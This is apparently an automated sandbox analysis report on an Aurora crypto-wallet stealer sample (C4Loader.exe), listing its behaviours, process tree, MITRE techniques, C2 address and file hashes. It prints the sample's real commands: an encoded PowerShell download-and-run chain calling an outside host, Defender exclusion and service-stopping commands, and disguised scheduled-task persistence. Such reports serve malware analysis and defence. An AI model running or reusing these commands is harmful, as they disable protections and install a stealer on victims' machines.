aurora | fb0c637754e3546971be2c4ba4aa9e63f54948421c751b74e748f1fb3bbae955

Analysis

max time kernel
135s
max time network
42s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
04-04-2023 11:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

855KB
MD5

c5da2ceab187e9312e30ada95a65b7df
SHA1

d79c14118f6a767447da7bb25c752fa5861be201
SHA256

fb0c637754e3546971be2c4ba4aa9e63f54948421c751b74e748f1fb3bbae955
SHA512

e4bb03aaaeef87a774787a03554559cda2c0d14495ad8fc9e7728d702819562f7975cabfc713625a83cb167da3b377a80e12674a28932d7da650a78403468c3e
SSDEEP

3072:/gtlYTIQ2Y0A2Zf4DGrHUNc8z44jcK1Y3Vmirw:IvQ25A/i4jwK1YJ8

Score

10^/10

aurora evasion stealer

Malware Config

Extracted

Family

aurora

107.182.129.73:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

SmartDefRun.exe

description	pid	process	target process
PID 588 created 1204	588	SmartDefRun.exe	Explorer.EXE
PID 588 created 1204	588	SmartDefRun.exe	Explorer.EXE
PID 588 created 1204	588	SmartDefRun.exe	Explorer.EXE
PID 588 created 1204	588	SmartDefRun.exe	Explorer.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 916 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 4 IoCs

Processes:

C4Loader.exenew2.exeSysApp.exeSmartDefRun.exe

pid process

1132 C4Loader.exe
872 new2.exe
288 SysApp.exe
588 SmartDefRun.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exe

pid process

916 powershell.exe
916 powershell.exe
916 powershell.exe
916 powershell.exe
916 powershell.exe
916 powershell.exe
916 powershell.exe

flow	pid	process
4	916	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
1132	C4Loader.exe
872	new2.exe
288	SysApp.exe
588	SmartDefRun.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

C4Loader.exeSmartDefRun.exe

description	pid	process	target process
PID 1736 set thread context of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 588 set thread context of 2040	588	SmartDefRun.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe SmartDefRun.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

800 sc.exe
852 sc.exe
1328 sc.exe
1376 sc.exe
860 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

908 schtasks.exe
1088 schtasks.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe	SmartDefRun.exe

pid	process
800	sc.exe
852	sc.exe
1328	sc.exe
1376	sc.exe
860	sc.exe

pid	process
908	schtasks.exe
1088	schtasks.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.exeSmartDefRun.exepowershell.exepowershell.exedialer.exeSysApp.exe

pid	process
916	powershell.exe
916	powershell.exe
916	powershell.exe
916	powershell.exe
916	powershell.exe
916	powershell.exe
916	powershell.exe
916	powershell.exe
916	powershell.exe
588	SmartDefRun.exe
588	SmartDefRun.exe
548	powershell.exe
588	SmartDefRun.exe
588	SmartDefRun.exe
588	SmartDefRun.exe
588	SmartDefRun.exe
588	SmartDefRun.exe
588	SmartDefRun.exe
1724	powershell.exe
2040	dialer.exe
2040	dialer.exe
2040	dialer.exe
2040	dialer.exe
288	SysApp.exe
288	SysApp.exe
288	SysApp.exe
288	SysApp.exe
288	SysApp.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exedialer.exe

description	pid	process
Token: SeDebugPrivilege	916	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	2040	dialer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Loader.exeInstallUtil.exepowershell.execmd.exeSmartDefRun.exedialer.exepowershell.exeSysApp.exe

description	pid	process	target process
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1736 wrote to memory of 1304	1736	C4Loader.exe	InstallUtil.exe
PID 1304 wrote to memory of 916	1304	InstallUtil.exe	powershell.exe
PID 1304 wrote to memory of 916	1304	InstallUtil.exe	powershell.exe
PID 1304 wrote to memory of 916	1304	InstallUtil.exe	powershell.exe
PID 1304 wrote to memory of 916	1304	InstallUtil.exe	powershell.exe
PID 916 wrote to memory of 1132	916	powershell.exe	C4Loader.exe
PID 916 wrote to memory of 1132	916	powershell.exe	C4Loader.exe
PID 916 wrote to memory of 1132	916	powershell.exe	C4Loader.exe
PID 916 wrote to memory of 1132	916	powershell.exe	C4Loader.exe
PID 916 wrote to memory of 872	916	powershell.exe	new2.exe
PID 916 wrote to memory of 872	916	powershell.exe	new2.exe
PID 916 wrote to memory of 872	916	powershell.exe	new2.exe
PID 916 wrote to memory of 872	916	powershell.exe	new2.exe
PID 916 wrote to memory of 288	916	powershell.exe	SysApp.exe
PID 916 wrote to memory of 288	916	powershell.exe	SysApp.exe
PID 916 wrote to memory of 288	916	powershell.exe	SysApp.exe
PID 916 wrote to memory of 288	916	powershell.exe	SysApp.exe
PID 916 wrote to memory of 588	916	powershell.exe	SmartDefRun.exe
PID 916 wrote to memory of 588	916	powershell.exe	SmartDefRun.exe
PID 916 wrote to memory of 588	916	powershell.exe	SmartDefRun.exe
PID 916 wrote to memory of 588	916	powershell.exe	SmartDefRun.exe
PID 1140 wrote to memory of 860	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 860	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 860	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 800	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 800	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 800	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 852	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 852	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 852	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 1328	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 1328	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 1328	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 1376	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 1376	1140	cmd.exe	sc.exe
PID 1140 wrote to memory of 1376	1140	cmd.exe	sc.exe
PID 588 wrote to memory of 2040	588	SmartDefRun.exe	dialer.exe
PID 2040 wrote to memory of 416	2040	dialer.exe	winlogon.exe
PID 2040 wrote to memory of 460	2040	dialer.exe	services.exe
PID 1724 wrote to memory of 908	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 908	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 908	1724	powershell.exe	schtasks.exe
PID 2040 wrote to memory of 476	2040	dialer.exe	lsass.exe
PID 288 wrote to memory of 1088	288	SysApp.exe	schtasks.exe
PID 288 wrote to memory of 1088	288	SysApp.exe	schtasks.exe
PID 288 wrote to memory of 1088	288	SysApp.exe	schtasks.exe
PID 288 wrote to memory of 1088	288	SysApp.exe	schtasks.exe
PID 2040 wrote to memory of 484	2040	dialer.exe	lsm.exe
PID 2040 wrote to memory of 596	2040	dialer.exe	svchost.exe
PID 2040 wrote to memory of 672	2040	dialer.exe	svchost.exe
PID 2040 wrote to memory of 748	2040	dialer.exe	svchost.exe
PID 2040 wrote to memory of 808	2040	dialer.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:808
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:748
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:596

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1736
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1304
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:916
    - - C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:1132
    - - C:\Users\Admin\AppData\Local\Temp\new2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\new2.exe"
        5⤵
        Executes dropped EXE
        
        PID:872
    - - C:\Users\Admin\AppData\Local\Temp\SysApp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:288
      - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:1088
    - - C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:548
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1140
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:860
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:800
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:852
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1328
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1376
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#taygymmy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenMachine' /tr '''C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenMachine' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenMachine /tr "'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:908

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
9.9MB

MD5
d4a76dddf9eae43524dcd37ed0060a4f

SHA1
4722f3df695819ca1ac699a688c170d13e36159f

SHA256
e9650732978b458f756d090c3fed9e70b6c82510a2438c3dbf7f34aa88fa3254

SHA512
d18a1739ee45b790ea85f6fe57ade308c033718c59a5d4a71af0e57add0971342776bc26e4f38eb4f0b00c111dbf800bfb4ed0e3c826a73e6431e8c466dff0f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
9.9MB

MD5
d4a76dddf9eae43524dcd37ed0060a4f

SHA1
4722f3df695819ca1ac699a688c170d13e36159f

SHA256
e9650732978b458f756d090c3fed9e70b6c82510a2438c3dbf7f34aa88fa3254

SHA512
d18a1739ee45b790ea85f6fe57ade308c033718c59a5d4a71af0e57add0971342776bc26e4f38eb4f0b00c111dbf800bfb4ed0e3c826a73e6431e8c466dff0f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4d549b1165d721ad4a66a0e616cdd8be

SHA1
d77fd0d8fcec9e9c0e4b3730c63e868ceafb1495

SHA256
6078c9d5a5ea2498b6bad856abfc8aa8200e667936ad07726e1c1ef49656cffe

SHA512
c66dfc549027545fad11b15151a17b0f3e1a4bc6219e57e367a7f9ee9a2ac49dfedf18861d65fd8b902306265b2f8d4dfd86fc148c540e667d3d99028eb04dd6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SW3IFJXRIJ29JN4LZ42D.temp

Filesize
7KB

MD5
4d549b1165d721ad4a66a0e616cdd8be

SHA1
d77fd0d8fcec9e9c0e4b3730c63e868ceafb1495

SHA256
6078c9d5a5ea2498b6bad856abfc8aa8200e667936ad07726e1c1ef49656cffe

SHA512
c66dfc549027545fad11b15151a17b0f3e1a4bc6219e57e367a7f9ee9a2ac49dfedf18861d65fd8b902306265b2f8d4dfd86fc148c540e667d3d99028eb04dd6

Download Submit
\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
9.9MB

MD5
d4a76dddf9eae43524dcd37ed0060a4f

SHA1
4722f3df695819ca1ac699a688c170d13e36159f

SHA256
e9650732978b458f756d090c3fed9e70b6c82510a2438c3dbf7f34aa88fa3254

SHA512
d18a1739ee45b790ea85f6fe57ade308c033718c59a5d4a71af0e57add0971342776bc26e4f38eb4f0b00c111dbf800bfb4ed0e3c826a73e6431e8c466dff0f5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
